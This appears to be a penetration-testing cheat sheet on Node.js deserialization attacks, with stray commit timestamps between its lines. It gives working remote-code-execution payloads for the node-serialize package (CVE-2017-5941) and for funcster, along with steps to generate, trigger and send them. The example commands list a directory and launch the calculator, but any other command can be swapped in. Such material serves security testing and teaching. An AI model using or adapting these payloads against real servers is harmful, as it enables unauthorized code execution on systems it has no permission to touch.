2022-10-12 10:13:55 +00:00
# Node Deserialization
2022-09-23 09:21:29 +00:00
2024-11-10 13:37:48 +00:00
> Node.js deserialization refers to the process of reconstructing JavaScript objects from a serialized format, such as JSON, BSON, or other formats that represent structured data. In Node.js applications, serialization and deserialization are commonly used for data storage, caching, and inter-process communication.
2022-09-23 09:21:29 +00:00
## Summary
2024-11-10 13:37:48 +00:00
* [Methodology ](#methodology )
2022-11-03 20:31:50 +00:00
* [node-serialize ](#node-serialize )
* [funcster ](#funcster )
2022-09-23 09:21:29 +00:00
* [References ](#references )
2024-11-06 22:32:18 +00:00
2024-11-10 13:37:48 +00:00
## Methodology
2022-09-23 09:21:29 +00:00
2022-11-03 20:31:50 +00:00
* In Node source code, look for:
* `node-serialize`
* `serialize-to-js`
* `funcster`
2024-11-06 22:32:18 +00:00
2022-11-03 20:31:50 +00:00
### node-serialize
2022-09-23 09:21:29 +00:00
> An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).
1. Generate a serialized payload
```js
var y = {
rce : function(){
require('child_process').exec('ls /', function(error,
stdout, stderr) { console.log(stdout) });
},
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));
```
2. Add bracket `()` to force the execution
```js
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"}
```
3. Send the payload
2024-11-06 22:32:18 +00:00
2022-11-03 20:31:50 +00:00
### funcster
```js
{"rce":{"__js_function":"function(){CMD=\"cmd /c calc\";const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').exec(CMD,function(error,stdout,stderr){console.log(stdout)});}()"}}
```
2022-09-23 09:21:29 +00:00
## References
2024-11-10 13:37:48 +00:00
- [CVE-2017-5941 - National Vulnerability Database - February 9, 2017 ](https://nvd.nist.gov/vuln/detail/CVE-2017-5941 )
2024-11-06 22:32:18 +00:00
- [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham - October 31, 2018 ](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf )
- [NodeJS Deserialization - gonczor - January 8, 2020 ](https://blacksheephacks.pl/nodejs-deserialization/ )